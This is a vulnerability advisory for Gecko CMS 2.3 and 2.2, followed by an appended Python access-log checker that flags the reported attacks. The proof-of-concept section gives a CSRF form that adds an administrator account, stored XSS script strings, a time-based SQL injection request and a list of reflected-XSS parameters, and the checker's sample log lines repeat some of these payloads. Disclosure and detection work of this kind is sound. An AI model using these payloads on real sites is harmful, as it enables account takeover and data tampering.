Gecko CMS 2.3 Multiple Vulnerabilities

2015-01-12 00:00:00
Gjoko Krstic
zeroscience.mk

CVSS2: 6.8 Medium (AV:N/AC:M/Au:N/C:P/I:P/A:P)
Attack Vector: NETWORK
Attack Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL

AI Score: 7.1 High (Confidence: High)

EPSS: 0.011 Low (Percentile: 84.6%)

Title: Gecko CMS 2.3 Multiple Vulnerabilities
Advisory ID: ZSL-2015-5222
Type: Local/Remote
Impact: Cross-Site Scripting, Exposure of System Information, Exposure of Sensitive Information, Manipulation of Data
Risk: (3/5)
Release Date: 12.01.2015

Summary

Gecko CMS is the way to go, forget complicated, bloated and slow content management systems, Gecko CMS has been built to be intuitive, easy to use, extendable to almost anything, running on all standard web hosting (PHP and one MySQL database, Apache is a plus), browser compatibility and fast, super fast!

Description

Gecko CMS suffers from multiple vulnerabilities including Cross-Site Request Forgery, Stored and Reflected Cross-Site Scripting and SQL Injection.

Vendor

JAKWEB - <http://www.cmsgecko.com>

Affected Version

2.3 and 2.2

Tested On

Apache/2
PHP/5.4.36

Vendor Status

[27.12.2014] Vulnerabilities discovered.
[05.01.2015] Vendor contacted.
[06.01.2015] Vendor responds asking more details.
[06.01.2015] Sent details to the vendor.
[06.01.2015] Vendor confirms issues but is not going to develop a fix because the issues are present in the admin panel (authenticated area).
[12.01.2015] Public security advisory released.

PoC

geckocms_mv.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <http://www.exploit-db.com/exploits/35767/>
[2] <http://packetstormsecurity.com/files/129929>
[3] <http://cxsecurity.com/issue/WLB-2015010058>
[4] <http://osvdb.org/show/osvdb/116966>
[5] <http://osvdb.org/show/osvdb/116967>
[6] <http://osvdb.org/show/osvdb/116968>
[7] <http://osvdb.org/show/osvdb/116969>
[8] <http://osvdb.org/show/osvdb/116970>
[9] <http://www.securityfocus.com/bid/72085>
[10] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2015-1422>
[11] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2015-1423>
[12] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2015-1424>
[13] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1422>
[14] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1423>
[15] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1424>
[16] <http://xforce.iss.net/xforce/xfdb/99974>
[17] <http://xforce.iss.net/xforce/xfdb/99975>
[18] <http://xforce.iss.net/xforce/xfdb/99976>
[19] <http://xforce.iss.net/xforce/xfdb/99977>

Changelog

[12.01.2015] - Initial release
[14.01.2015] - Added reference [1], [2], [3], [4], [5], [6], [7] and [8]
[23.01.2015] - Added reference [9]
[30.01.2015] - Added reference [10], [11], [12], [13], [14], [15], [16], [17], [18] and [19]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

Gecko CMS 2.3 Multiple Vulnerabilities


Vendor: JAKWEB
Product web page: http://www.cmsgecko.com
Affected version: 2.3 and 2.2

Summary: Gecko CMS is the way to go, forget complicated, bloated
and slow content management systems, Gecko CMS has been built to
be intuitive, easy to use, extendable to almost anything, running
on all standard web hosting (PHP and one MySQL database, Apache is
a plus), browser compatibility and fast, super fast!

Desc: Gecko CMS suffers from multiple vulnerabilities including
Cross-Site Request Forgery, Stored and Reflected Cross-Site Scripting
and SQL Injection.

Tested on: Apache/2
           PHP/5.4.36


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5222
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5222.php


27.12.2014

---


CSRF Add Admin:
===============


<form action="http://demo.cmsgecko.com/admin/index.php?p=user&sp=newuser" method="POST">
<input name="jak_name" type="hidden" value="Testingus2"/>
<input name="jak_email" type="hidden" value="[email protected]"/>
<input name="jak_username" type="hidden" value="Testusername2"/>
<input name="jak_usergroup" type="hidden" value="3"/>
<input name="jak_access" type="hidden" value="1"/>
<input name="jak_password" type="hidden" value="123123"/>
<input name="jak_confirm_password" type="hidden" value="123123"/>
<input name="save" type="hidden" value=""/>
<input type="submit" value="Submit form"/>
</form>


usergroup 4 = moderator
          3 = administrator
          2 = member standard
          1 = guest
          5 = banned


Stored XSS (params: jak_img, jak_name, jak_url):
================================================

POST http://demo.cmsgecko.com/admin/index.php?p=categories&sp=newcat HTTP/1.1

jak_catparent	0
jak_catparent2	0
jak_footer	1
jak_img	"><script>alert(1);</script>
jak_lcontent	<p>test</p>
jak_lcontent2	
jak_menu	1
jak_name	"><script>alert(2);</script>
jak_name2	
jak_url	"><script>alert(3);</script>
jak_varname	ZSL
save	


SQL Injection (params: jak_delete_log[], ssp):
==============================================

POST /admin/index.php?p=logs&sp=s HTTP/1.1

delete=&jak_delete_log%5B%5D=4%20and%20benchmark(20000000%2csha1(1))--%20&jak_delete_log%5B%5D=2&jak_delete_log%5B%5D=1

--

GET /admin/index.php?p=logs&sp=delete&ssp=3[SQLi] HTTP/1.1


Reflected XSS:
==============

/admin/index.php [horder%5B%5D parameter]
/admin/index.php [jak_catid parameter]
/admin/index.php [jak_content parameter]
/admin/index.php [jak_css parameter]
/admin/index.php [jak_delete_log%5B%5D parameter]
/admin/index.php [jak_email parameter]
/admin/index.php [jak_extfile parameter]
/admin/index.php [jak_file parameter]
/admin/index.php [jak_hookshow%5B%5D parameter]
/admin/index.php [jak_img parameter]
/admin/index.php [jak_javascript parameter]
/admin/index.php [jak_lcontent parameter]
/admin/index.php [jak_name parameter]
/admin/index.php [jak_password parameter]
/admin/index.php [jak_showcontact parameter]
/admin/index.php [jak_tags parameter]
/admin/index.php [jak_title parameter]
/admin/index.php [jak_url parameter]
/admin/index.php [jak_username parameter]
/admin/index.php [real_hook_id%5B%5D parameter]
/admin/index.php [sp parameter]
/admin/index.php [sreal_plugin_id%5B%5D parameter]
/admin/index.php [ssp parameter]
/admin/index.php [sssp parameter]
/js/editor/plugins/filemanager/dialog.php [editor parameter]
/js/editor/plugins/filemanager/dialog.php [field_id parameter]
/js/editor/plugins/filemanager/dialog.php [fldr parameter]
/js/editor/plugins/filemanager/dialog.php [lang parameter]
/js/editor/plugins/filemanager/dialog.php [popup parameter]
/js/editor/plugins/filemanager/dialog.php [subfolder parameter]
/js/editor/plugins/filemanager/dialog.php [type parameter]
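Since the vendor declined to fix these issues, an operator is left with detection. The following is an added example, not part of the advisory or of Gecko CMS: a small Python checker that reads Apache combined-format access-log lines (the advisory lists Apache/2) for an assumed host demo.cmsgecko.com and tags the three request patterns described above: non-integer record ids on the p=logs page (SQLi indicator), markup in parameters the advisory lists as reflected (XSS indicator), and state-changing admin POSTs whose Referer is absent or cross-origin (CSRF indicator). The sample log lines are constructed; the payload strings in them are the ones quoted in the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache combined log format (the advisory lists Apache/2 as the tested server).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "[^"]*"$')
SITE_HOST = "demo.cmsgecko.com"  # assumed host of the admin panel being monitored
# Query parameters the advisory reports as reflected unescaped (a subset of its list).
XSS_PARAMS = {"sp", "ssp", "sssp", "jak_catid", "jak_name", "jak_url", "jak_img", "editor", "fldr", "type", "lang"}
MARKUP_RE = re.compile(r'<\s*script|"\s*>|javascript:', re.I)
NUMERIC_PARAMS = ("ssp", "jak_delete_log[]")  # record ids on p=logs, expected to be plain integers

def analyse_line(line, site_host=SITE_HOST):
    """Return sorted indicator tags for one access-log line ([] means nothing noteworthy)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    _src, method, target, _status, referer = m.groups()
    url = urlsplit(target)
    q = parse_qs(url.query, keep_blank_values=True)  # also decodes %5B%5D -> []
    found = set()
    is_admin = url.path.endswith("/admin/index.php")
    # 1. Log-management page called with a non-integer record id (SQLi indicator).
    if is_admin and q.get("p") == ["logs"]:
        for key in NUMERIC_PARAMS:
            if any(not v.strip().isdigit() for v in q.get(key, [])):
                found.add(f"sqli:{key}")
    # 2. Script tags or attribute break-outs in parameters known to be reflected.
    for key in XSS_PARAMS:
        if any(MARKUP_RE.search(v) for v in q.get(key, [])):
            found.add(f"xss:{key}")
    # 3. State-changing admin POST whose Referer is missing or from another origin (CSRF indicator).
    if method == "POST" and is_admin and q.get("sp") in (["newuser"], ["newcat"]):
        ref_host = urlsplit(referer).hostname if referer != "-" else None
        if ref_host != site_host:
            found.add("csrf:" + (ref_host or "no-referer"))
    return sorted(found)

def scan(lines):
    """(client ip, tags) for every line that raised at least one indicator."""
    return [(l.split(" ", 1)[0], t) for l in lines if (t := analyse_line(l))]

# Constructed sample lines (not real traffic); the payloads are the ones quoted in the advisory.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Jan/2015:10:00:01 +0100] "GET /admin/index.php?p=logs&sp=delete&ssp=3 HTTP/1.1" 200 512 "http://demo.cmsgecko.com/admin/index.php?p=logs" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Jan/2015:10:00:09 +0100] "GET /admin/index.php?p=logs&sp=delete&ssp=3%20and%20benchmark(20000000%2csha1(1))--%20 HTTP/1.1" 200 512 "http://demo.cmsgecko.com/admin/index.php?p=logs" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Jan/2015:10:01:30 +0100] "GET /js/editor/plugins/filemanager/dialog.php?type=1&fldr=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Jan/2015:10:05:00 +0100] "POST /admin/index.php?p=user&sp=newuser HTTP/1.1" 302 0 "http://other-site.example/page.html" "Mozilla/5.0"',
]
```

The Referer check only covers requests that carry one, and POST bodies (the stored XSS and jak_delete_log[] cases) are not in access logs, so those two need request-body logging or a WAF rule with the same patterns.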